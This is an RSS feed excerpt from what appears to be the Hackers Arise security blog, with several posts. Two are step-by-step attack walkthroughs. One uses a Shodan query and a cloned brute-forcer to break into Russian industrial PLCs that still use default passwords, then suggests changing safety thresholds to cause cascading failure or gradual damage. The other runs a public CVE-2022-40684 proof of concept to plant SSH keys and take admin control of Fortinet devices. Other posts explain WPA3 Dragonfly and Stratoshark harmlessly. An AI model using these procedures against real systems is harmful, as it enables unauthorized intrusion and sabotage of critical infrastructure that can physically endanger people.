<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="519" src="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_analyzing.avif" alt="" class="wp-image-15592" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_analyzing.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_analyzing-300x210.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
This pane features a specialized set of expandable headers specifically designed for system call analysis. The most valuable headers for your analysis include:
<ul id="g023u5537" class="wp-block-list">
<li>System Event – works just like Wireshark’s “Frame” header
<ul class="wp-block-list">
<li>Arrival Time – exact timestamp when the event occurred</li>
</ul>
</li>
<li>Event Information – contains the most essential analysis data
<ul class="wp-block-list">
<li>Direction – right-facing caret (>) shows a call from application to OS (request), while left-facing caret (<) indicates the OS response</li>
<li>Type – shows which specific system call function is being invoked</li>
<li>Arguments – displays the request or response values when applicable, varying by function called</li>
</ul>
</li>
<li>Process Information – details about the process making or receiving the system call
<ul class="wp-block-list">
<li>Name – identifies the process name</li>
<li>Parent Name – shows which process spawned the current one (for example, in a system running Apache, you might see Name = kworker and Parent Name = apache)</li>
<li>Process ID – matches the PID you’d see in tools like netstat or top, making it easy to correlate with other data sources</li>
</ul>
</li>
<li>File Descriptor Information – when present, shows details about files the process is interacting with
<ul class="wp-block-list">
<li>FD Name – since Linux treats almost everything as a file, this includes network sockets and other system resources</li>
</ul>
</li>
</ul>
Mastering these key components will help you effectively interpret system call data and extract valuable insights from your captures.
<h2 class="wp-block-heading" id="vbmft8101">Summary</h2>
Stratoshark serves as a powerful companion to Wireshark, extending your digital forensic capabilities beyond network traffic analysis to system-level activity monitoring. By capturing and analyzing system calls directly from the Linux kernel, Stratoshark delivers crucial visibility into process-OS interactions—particularly valuable in today’s cloud-based, containerized environments where traditional network monitoring often falls short.The post <a href="https://hackers-arise.com/network-forensics-getting-started-with-stratoshark/">Network Forensics: Getting Started With Stratoshark</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/network-forensics-getting-started-with-stratoshark/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Wi-Fi Hacking: Inside DragonFly, the WPA3’s Next-Gen Wireless Authentication Protocol</title>
<link>https://hackers-arise.com/wi-fi-hacking-inside-dragonfly-the-wpa3s-next-gen-wireless-authentication-protocol/</link>
<comments>https://hackers-arise.com/wi-fi-hacking-inside-dragonfly-the-wpa3s-next-gen-wireless-authentication-protocol/#respond</comments>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Mon, 23 Jun 2025 16:07:06 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[IoT Hacking]]></category>
<category><![CDATA[Network Exploitation]]></category>
<category><![CDATA[Wi-Fi Hacking]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15761</guid>
<description><![CDATA[Welcome back, aspiring cyberwarriors! On June 25, 2018, the Wi-Fi Alliance officially introduced WPA3, a new era for wireless security. While WPA2 has dominated the landscape for over a decade, the world has changed, threats have evolved, and so has the need for more robust authentication. At the core of WPA3’s improvements is the Dragonfly […]
The post <a href="https://hackers-arise.com/wi-fi-hacking-inside-dragonfly-the-wpa3s-next-gen-wireless-authentication-protocol/">Wi-Fi Hacking: Inside DragonFly, the WPA3’s Next-Gen Wireless Authentication Protocol</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring cyberwarriors!
On June 25, 2018, the Wi-Fi Alliance officially introduced WPA3, a new era for wireless security. While WPA2 has dominated the landscape for over a decade, the world has changed, threats have evolved, and so has the need for more robust authentication. At the core of WPA3’s improvements is the Dragonfly protocol – also known as Simultaneous Authentication of Equals (SAE).
Let’s pull back the curtain and see what Dragonfly is all about.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="678" height="747" src="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_logo-1.png" alt="" class="wp-image-15766" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_logo-1.png 678w, https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_logo-1-272x300.png 272w" sizes="(max-width: 678px) 100vw, 678px" /></figure>
<h2 class="wp-block-heading">The Problem with WPA2 and PSK</h2>
If you’ve spent any time in the field, you know that WPA2 relies on the Pre-Shared Key (PSK) method for authentication. It’s simple: everyone on the network uses the same password. But simplicity comes at a cost. Attackers can capture the handshake between a client and an access point and launch an offline brute-force attack. With modern GPUs or even cloud resources, this process is faster and easier than ever, especially if the password is weak or reused. To learn more about cracking WPA2-PSK check out this <a href="https://hackers-arise.com/wireless-hacking-cracking-the-wpa2-psk-with-aircrack-ng/">article</a>.
This vulnerability has made WPA2-PSK networks a target for attackers, penetration testers, and anyone looking to test their password-cracking skills. The Wi-Fi Alliance knew this was a problem that needed fixing, especially as Wi-Fi becomes the backbone of everything from smart homes to industrial systems.
<h2 class="wp-block-heading">Enter Dragonfly: The New Defender</h2>
WPA3’s answer is the Dragonfly protocol. Unlike WPA2, Dragonfly doesn’t let attackers just grab a handshake and brute-force it at their leisure. Instead, it forces every password guess to be performed live, in real time, with the access point. This means that attackers can’t just passively collect handshakes and crack them later on their own hardware. Every attempt to guess a password requires direct interaction with the target network, making large-scale attacks noisy, slow, and much easier to detect.
Dragonfly is built on the mathematical foundations of elliptic curve cryptography (ECC) or finite field cryptography (FFC). The heart of its security lies in the discrete logarithm problem – a challenge so computationally hard that even the most well-funded adversaries struggle to solve it.
<h2 class="wp-block-heading">How Dragonfly Works: The Protocol in Action</h2>
To understand Dragonfly, you need to look at how it transforms a simple password into a fortress of cryptographic defenses. The process begins with both the client and the access point sharing a password—just like with WPA2. But what happens next is very different.
Instead of hashing the password and sending it over the air, both sides use the password to generate a unique mathematical element, either a point on an elliptic curve or an element in a finite field. This is where the so-called “hunting and pecking” algorithm comes into play. The goal here is to ensure that the same password always results in the same mathematical element, but that it’s computationally infeasible to reverse the process and recover the password from the element alone.
Once this shared element is established, the protocol moves into the commit phase. Both parties generate random private values and compute corresponding public values. These public values are then combined with the password-derived element to create commit messages, which are exchanged.
The commit phase is more than just a handshake. It establishes the cryptographic parameters for the session, ensures that both sides genuinely know the password, and starts the process of deriving the session keys that will protect all subsequent communication.
After the commit exchange, the protocol enters the confirm phase. Here, both sides compute confirmation values based on the exchanged messages and the derived shared secret. These values act as proof that both parties have successfully completed the authentication process and possess the correct password. If everything checks out, the authentication is finalized, and a fresh session key is established.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="667" height="570" src="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_handshake.png" alt="" class="wp-image-15763" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_handshake.png 667w, https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_handshake-300x256.png 300w" sizes="(max-width: 667px) 100vw, 667px" /><figcaption class="wp-element-caption"> WPA3’s Dragonfly handshake</figcaption></figure>
<h2 class="wp-block-heading">The Cryptography Behind Dragonfly</h2>
Dragonfly’s cryptographic operations are designed to offer strong resistance against a wide range of attacks, while still being efficient enough to run on everything from laptops to IoT sensors. The protocol supports both elliptic curve and finite field groups, giving implementers flexibility to choose what best fits their devices and threat models.
Elliptic curve implementations are typically favored for their combination of security and efficiency. Well-known curves like P-256, P-384, or P-521 are commonly used, offering strong protection without overtaxing device resources. Even resource-constrained devices can handle the necessary operations within acceptable timeframes.
For those who opt for finite field cryptography, Dragonfly uses modular arithmetic over carefully chosen prime fields. The selection of these fields follows established cryptographic standards, ensuring that the discrete logarithm problem remains hard to solve – even for attackers with specialized hardware or distributed computing power.
<h2 class="wp-block-heading">Security Properties That Matter</h2>
One of Dragonfly’s standout features is perfect forward secrecy (PFS). This means that even if someone manages to compromise the shared password at some point in the future, all previous communication sessions remain secure. This is achieved by generating ephemeral keys for each authentication session, derived from random values generated during each protocol run. It’s a critical property, especially in environments where passwords might be shared among many users or left unchanged for long periods.
Another major innovation is Dragonfly’s resistance to offline dictionary attacks. In traditional schemes, an attacker who captures authentication messages can try as many password guesses as they want, offline, without ever alerting the network. Dragonfly changes the rules: verifying a password guess requires active participation from both parties. The captured messages alone don’t provide enough information for an attacker to verify guesses independently. This fundamentally changes the threat landscape for wireless networks.
Mutual authentication is another core benefit. Both the client and the access point must prove knowledge of the shared password. This prevents rogue access points and client impersonation, shutting down a wide range of attacks that have plagued Wi-Fi networks for years.
The protocol also includes robust key derivation mechanisms. Session keys are generated using the shared secret established during authentication, combined with random values and protocol parameters to ensure uniqueness and unpredictability. These keys are suitable for use with a variety of encryption algorithms, providing strong protection for all subsequent communication.
<h2 class="wp-block-heading">Real-World Implementation: What It Means for Devices</h2>
Implementing Dragonfly does require more computational effort than WPA2-PSK, but modern hardware is up to the task. Elliptic curve operations, in particular, are efficient and well-supported by today’s wireless chipsets. Even battery-powered devices can handle Dragonfly’s workload without noticeable impact on performance or user experience.
Memory requirements are modest, too. Devices need to store cryptographic parameters, temporary values for calculations, and buffers for protocol messages. For most modern devices, this is no problem. Even in the world of IoT, where resources are tight, Dragonfly can be implemented with careful optimization.
Interoperability is crucial. Dragonfly is specified in several standards, including IEEE 802.11, RFC 7664, and Wi-Fi Alliance documents. Implementers must follow these standards closely to ensure that devices from different manufacturers can communicate securely. This includes agreeing on cryptographic groups, message formats, error handling, and security parameter selection.
<h2 class="wp-block-heading">Known Limitations and Ongoing Research</h2>
While Dragonfly is a huge step forward, it’s not invincible. Researchers have identified potential side-channel vulnerabilities in some implementations, where timing or cache-based attacks could leak information about the password element. These attacks are complex and require close proximity or advanced capabilities, but they’re a reminder that implementation matters as much as protocol design.
Another concern is the so-called “transition mode” in WPA3, where networks support both WPA2 and WPA3 for compatibility. This can open the door to downgrade attacks, where an attacker forces a client to use the less secure WPA2 handshake, then cracks the password offline as before. The best defense is to use WPA3-only mode whenever possible.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="628" height="340" src="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_downgrade_attack.png" alt="" class="wp-image-15764" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_downgrade_attack.png 628w, https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_downgrade_attack-300x162.png 300w" sizes="(max-width: 628px) 100vw, 628px" /><figcaption class="wp-element-caption"> Dictionary attack against WPA3-SAE when it is operating in transition mode, by attempting to downgrade the client into directly using WPA2’s 4-way handshake.</figcaption></figure>
Implementation bugs are another risk. As with any complex protocol, mistakes in coding or configuration can introduce vulnerabilities. Regular updates, thorough testing, and adherence to best practices are essential to maintain security.
<h2 class="wp-block-heading">Summary</h2>
The introduction of Dragonfly marks a major milestone in the evolution of wireless security. By fundamentally changing how passwords are used and protected, it makes life much harder for attackers and raises the bar for everyone. But as always, security is a moving target. New attacks and vulnerabilities will emerge, and defenders must stay vigilant.
To learn more about Wi-Fi hacking attend our <a href="https://hackers-arise.com/schedule/">online class July 22-24</a>.
The post <a href="https://hackers-arise.com/wi-fi-hacking-inside-dragonfly-the-wpa3s-next-gen-wireless-authentication-protocol/">Wi-Fi Hacking: Inside DragonFly, the WPA3’s Next-Gen Wireless Authentication Protocol</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/wi-fi-hacking-inside-dragonfly-the-wpa3s-next-gen-wireless-authentication-protocol/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>SCADA/ICS Security in Cyber Warfare: Exposing Vulnerabilities in Russian ICS Infrastructure</title>
<link>https://hackers-arise.com/scada-ics-security-in-cyber-warfare-exposing-vulnerabilities-in-russian-ics-infrastructure/</link>
<comments>https://hackers-arise.com/scada-ics-security-in-cyber-warfare-exposing-vulnerabilities-in-russian-ics-infrastructure/#respond</comments>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Sun, 22 Jun 2025 18:39:14 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[SCADA/ICS Hacking]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15565</guid>
<description><![CDATA[Welcome back, aspiring cyberwarriors. In today’s article we will explore Russian industrial control system (ICS), revealing vulnerabilities waiting to be exploited. These systems are critical, yet security often remains an afterthought. Even Russia, which has spent years aggressively hardening its cybersecurity in preparation for its invasion of Ukraine, continues to suffers from vulnerabilities and basic […]
The post <a href="https://hackers-arise.com/scada-ics-security-in-cyber-warfare-exposing-vulnerabilities-in-russian-ics-infrastructure/">SCADA/ICS Security in Cyber Warfare: Exposing Vulnerabilities in Russian ICS Infrastructure</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring cyberwarriors.
In today’s article we will explore Russian industrial control system (ICS), revealing vulnerabilities waiting to be exploited. These systems are critical, yet security often remains an afterthought. Even Russia, which has spent years aggressively hardening its cybersecurity in preparation for its invasion of Ukraine, continues to suffers from vulnerabilities and basic negligence by security engineers and administrators.
<h2 class="wp-block-heading" id="xh85o96">A Brief Overview of SCADA and PLCs</h2>
SCADA systems (Supervisory Control and Data Acquisition) are a type of ICS designed for supervising and controlling industrial operations over long distances. Because they rely on networks to connect remote equipment, SCADA systems are more vulnerable to cyberattacks than centralized ICS. At the core of SCADA operations are specialized computers called PLCs (Programmable Logic Controllers). These devices directly manage machinery and processes by collecting data from sensors (such as pressure, temperature, or voltage sensors) and then executing actions based on their programming, such as closing a valve, triggering cooling systems, or initiating an emergency shutdown. Which means, once a PLC is compromised it can damage physical equipment.
In this article, in cooperation with a student from the Cyber Cossacks School – Citadel, we will demonstrate how relatively easy it is to access Russian PLCs.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="350" height="228" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_logo.avif" alt="" class="wp-image-15567" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_logo.avif 350w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_logo-300x195.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" /></figure>
<h2 class="wp-block-heading" id="wvc4r106618">Step #1: Find Systems With 401 Response</h2>
To search, let’s use the well-known Shodan: country:ru ‘401’
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="453" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_search.avif" alt="" class="wp-image-15568" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_search.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_search-300x184.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
Over 144,000 results!
We need to copy ports along with their quantity to the file, for example unfiltered.txt
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="458" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results.avif" alt="" class="wp-image-15569" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results-300x186.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="297" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results_save.avif" alt="" class="wp-image-15570" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results_save.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results_save-300x120.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="wlgyx331">Step #2: Filter The Ports</h2>
First, we need to download mass 401 brute forcer called bonappeti.
kali> git clone https://github.com/soupbone89/bonappeti.git
kali> cd bonappeti
Here, you will find the <a href="http://filter.py" rel="noreferrer noopener" target="_blank">filter.py</a> script, which is used to filter ports. Use it by providing your file with ports from Shodan as input.
kali> python3 <a href="http://filter.py" rel="noreferrer noopener" target="_blank">filter.py</a> unfiltered.txt
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="354" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_filter.avif" alt="" class="wp-image-15571" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_filter.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_filter-300x144.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
As a result, we got a file with a list of ports.
<h2 class="wp-block-heading" id="ir3aj649">Step #3: Start Brute Forcing</h2>
The bonappeti repository has a <a href="http://bruteforce.py" rel="noreferrer noopener" target="_blank">bruteforce.py</a> file that uses the shef utility to perform IP address parsing from Shodan. Let’s install it:
kali> git clone <a href="https://github.com/1hehaq/shef.git" rel="noreferrer noopener" target="_blank">https://github.com/1hehaq/shef.git</a> && cd shef && chmod +x <a href="http://shef.sh" rel="noreferrer noopener" target="_blank">shef.sh</a> && sudo mv <a href="http://shef.sh" rel="noreferrer noopener" target="_blank">shef.sh</a> /bin/shef && cd .. && rm -rf shef
If you open the brute force script, you can see that it searches for Russian IP addresses by default.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="180" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_script.avif" alt="" class="wp-image-15572" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_script.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_script-300x73.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
In the httpbrute directory, you can find files with logins and passwords.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="675" height="555" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_data.avif" alt="" class="wp-image-15573" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_data.avif 675w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_data-300x247.jpg 300w" sizes="(max-width: 675px) 100vw, 675px" /></figure>
Next, we’re ready to start the brute force.
kali> python3 <a href="http://bruteforce.py" rel="noreferrer noopener" target="_blank">bruteforce.py</a>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="352" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_run.avif" alt="" class="wp-image-15574" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_run.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_run-300x143.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
Successful attempts will be output in success.txt. To filter false positives use:
kali> cat success.txt | grep -v false
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="350" height="138" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_results.avif" alt="" class="wp-image-15575" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_results.avif 350w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_results-300x118.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" /></figure>
As a result, the following PLC was found with the default password.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="326" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plc1.avif" alt="" class="wp-image-15576" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plc1.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plc1-300x132.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="321" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plcs2.avif" alt="" class="wp-image-15577" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plcs2.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plcs2-300x130.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
Once you have access you can change the emergency temperature thresholds, alarms, sensor settings, and ultimately push machinery into unstable operating states. From this point, two strategies emerge: initiate a cascading failure or engineer gradual, subtle damage.
<h2 class="wp-block-heading" id="ai3jf2555">Summary</h2>
While technological solutions are important, the most critical defense lies in changing the mindset and practices of those responsible for maintaining these critical infrastructure systems. However, if the Russians don’t change anything by themselves, we won’t insist.The post <a href="https://hackers-arise.com/scada-ics-security-in-cyber-warfare-exposing-vulnerabilities-in-russian-ics-infrastructure/">SCADA/ICS Security in Cyber Warfare: Exposing Vulnerabilities in Russian ICS Infrastructure</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/scada-ics-security-in-cyber-warfare-exposing-vulnerabilities-in-russian-ics-infrastructure/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>VPN Hacking: Authentication Bypass on Fortinet Fortios</title>
<link>https://hackers-arise.com/vpn-hacking-authentication-bypass-on-fortinet-fortios/</link>
<comments>https://hackers-arise.com/vpn-hacking-authentication-bypass-on-fortinet-fortios/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Sat, 21 Jun 2025 15:59:42 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[IoT Hacking]]></category>
<category><![CDATA[Pentesting]]></category>
<category><![CDATA[Uncategorized]]></category>
<category><![CDATA[VPN]]></category>
<category><![CDATA[Vulnerabilities]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15209</guid>
<description><![CDATA[Welcome back, my aspiring cyberwarriors! The cybersecurity industry is dependent upon a few developers to produce routers and VPN’s to keep our data safe. Unfortunately, many of these developers have failed to provide products that take into account even the most rudimentary cybersecurity practices. Many of them are like Swiss cheese, full of vulnerable holes […]
The post <a href="https://hackers-arise.com/vpn-hacking-authentication-bypass-on-fortinet-fortios/">VPN Hacking: Authentication Bypass on Fortinet Fortios</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, my aspiring cyberwarriors!
The cybersecurity industry is dependent upon a few developers to produce routers and VPN’s to keep our data safe. Unfortunately, many of these developers have failed to provide products that take into account even the most rudimentary cybersecurity practices. Many of them are like Swiss cheese, full of vulnerable holes that hackers and state actors are exploiting at will. These devices may be the weakest link in your network!
If the bad actors compromise your VPN/Router, ALL of your data is at risk. Not only is your data at risk, but the bad actors can also use the exploits of your VPN/Router to upload other malicious code such as ransomware. Among the companies guilty of this cybersecurity negligence, Fortinet stands out!
In 2022, a vulnerability was discovered in FortiOS, FortiProxy, and FortiSwitchManager that allows an attacker to bypass authentication and login into the device as admin. Security researchers at Horizon were able to develop a proof-of-concept (poc) to exploit this vulnerability. We are using that exploit in this tutorial.
In this attack, the attacker is capable of uploading their own SSH keys to the Fortinet device via the web server and then login as admin through SSH.

Step #1: Attempt to Login to SSH on the Fortinet Device
First, let’s attempt to login into the SSH on the Fortinet device.
<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="627" height="288" src="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-failed-login.png" alt="" class="wp-image-15216" style="width:750px;height:auto" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-failed-login.png 627w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-failed-login-300x138.png 300w" sizes="(max-width: 627px) 100vw, 627px" /></figure>
As expected, after 3 failed attempts, the SSH application locks us out.
Now, make certain that you create a pair of RSA keys for SSH.
kali > ssh-keygen
<figure class="wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1002" height="151" data-id="15308" src="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-keygen.png" alt="" class="wp-image-15308" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-keygen.png 1002w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-keygen-300x45.png 300w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-keygen-768x116.png 768w" sizes="(max-width: 1002px) 100vw, 1002px" /></figure>
</figure>
As you can see above, our SSH application generated a key pair (private/public) and placed it into a hidden directory /home/kali/ssh/id_ed25519. Your key pair with be different and likely have a different file name.
Step #2 Download and Install POC CVE-2022-40684
Thanks to the good people at Horizon.ai, we have a publicly available proof-of-concept (POC) or exploit to compromise this vulnerability
You can find it at https://github.com/horizon3ai/CVE-2022-40684

kali > git clone https://github.com/horizon3ai/CVE-2022-40684
After cloning it into your kali, navigate to the new directory.

To execute this exploit/poc, we simply need to point the exploit towards the target system IP address, define the username you want to exploit in SSH, and send your keyfile for that SSH user to the targeted server such as:

kali > sudo python3 ./CVE-2022-40684 poc.py -t <IP address> –username admin –key-file <ssh key file>


<figure class="wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="116" data-id="15226" src="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-key-added-2-1024x116.png" alt="" class="wp-image-15226" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-key-added-2-1024x116.png 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-key-added-2-300x34.png 300w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-key-added-2-768x87.png 768w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-key-added-2.png 1219w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</figure>

Now that we have added our key file to the SSH server, we should be able to login as admin with OUR SSH password.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="538" height="129" src="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-success-1.png" alt="" class="wp-image-15222" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-success-1.png 538w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-ssh-success-1-300x72.png 300w" sizes="(max-width: 538px) 100vw, 538px" /></figure>
As you can see above, we have successfully logged into the Fortinet device as admin and now have complete control of this device!
We can take a further step and enter the “show” command to display some basic information on this system including the “user=admin”.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="860" height="406" src="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-config.png" alt="" class="wp-image-15225" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-config.png 860w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-config-300x142.png 300w, https://hackers-arise.com/wp-content/uploads/2025/06/fortinet-config-768x363.png 768w" sizes="(max-width: 860px) 100vw, 860px" /></figure>
As an attacker, I can now shutdown or reconfigure your device as well as sniff all the traffic across this interface.
Summary
Although VPN’s are marketing to organizations around the globe to keep us safe and secure, the developers of these devices are proven themselves to be unworthy of the trust we place in them. Many of these devices are the weakest link on our network.

Any pentest or cyberwar strategy that does not test the security of these devices is inadequate and insufficient. Attend our upcoming VPN and Router Hacking training to learn the latest techniques for testing and hacking these vulnerable devices!
The post <a href="https://hackers-arise.com/vpn-hacking-authentication-bypass-on-fortinet-fortios/">VPN Hacking: Authentication Bypass on Fortinet Fortios</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/vpn-hacking-authentication-bypass-on-fortinet-fortios/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Now that the US Has Bombed Iran, Should We Expect Attacks Against US Critical Industrial Infrastructure (SCADA/ICS)?</title>
<link>https://hackers-arise.com/if-the-us-attacks-iran-will-iran-attack-us-industrial-facilities-scada-ics/</link>
<comments>https://hackers-arise.com/if-the-us-attacks-iran-will-iran-attack-us-industrial-facilities-scada-ics/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Sat, 21 Jun 2025 15:15:41 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[SCADA/ICS Hacking]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15783</guid>
<description><![CDATA[Welcome back, my cyberwarriors! As the US and Iran lurch toward a military confrontation, we must ask whether the US and other western nations’ industrial facilities are at risk. Unquestionably, Iran does NOT have the military capabilities to counter the US in a kinetic war, but could they terrorize the US industrial facilities instead? In […]
The post <a href="https://hackers-arise.com/if-the-us-attacks-iran-will-iran-attack-us-industrial-facilities-scada-ics/">Now that the US Has Bombed Iran, Should We Expect Attacks Against US Critical Industrial Infrastructure (SCADA/ICS)?</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[
Welcome back, my cyberwarriors!

As the US and Iran lurch toward a military confrontation, we must ask whether the US and other western nations’ industrial facilities are at risk. Unquestionably, Iran does NOT have the military capabilities to counter the US in a kinetic war, but could they terrorize the US industrial facilities instead?
